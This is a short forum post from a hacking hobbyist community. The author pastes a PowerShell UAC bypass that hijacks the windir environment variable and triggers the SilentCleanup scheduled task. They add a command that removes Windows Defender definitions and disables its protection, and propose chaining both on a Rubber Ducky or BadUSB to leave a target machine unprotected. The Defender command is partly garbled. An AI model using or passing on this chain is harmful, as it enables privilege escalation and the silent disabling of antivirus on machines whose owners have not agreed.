Jump to content

bypassing uac and disable defender


Recommended Posts

So I had an Idea recently not sure if it'll work don't bash me on it but I was thinking about combining some of darrens videos and using a bad usb or a rubber ducky to not only bypass uac but turn off defender

I been trying this for some time now trying this on my virtual box and windows 10 laptop.In one of his videos he shows Promptless UAC Bypass & Powershell Privilege Escalation.


if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
    #Payload goes here
    #It'll run as Administrator
} else {
    $registryPath = "HKCU:\Environment"
    $Name = "windir"
    $Value = "powershell -ep bypass -w h $PSCommandPath;#"
    Set-ItemProperty -Path $registryPath -Name $name -Value $Value
    #Depending on the performance of the machine, some sleep time may be required before or after schtasks
    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
    Remove-ItemProperty -Path $registryPath -Name $name


(what I have learned from running this in a notepad then saving as a uac.ps1 but before executing the uac.ps1 you need to run "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass" and select yes to avoid the "script is not signed" error)

also using the code from Disabling Defender With Viss Episode 1 showed


"c\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All set-MpPreference -DisableIOVProtection $true


disabling defender but it needs to be run in the admin CMD


what I am thinking here is some how coding a rubber ducky in to first bypassing uac then disabling windows defender

That way you can begin and have fun with your unlocked unprotected machine. Once again just an idea I have no clue if its possible or makes sense.  But id really love to try.

Link to comment
Share on other sites

  • 5 months later...


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...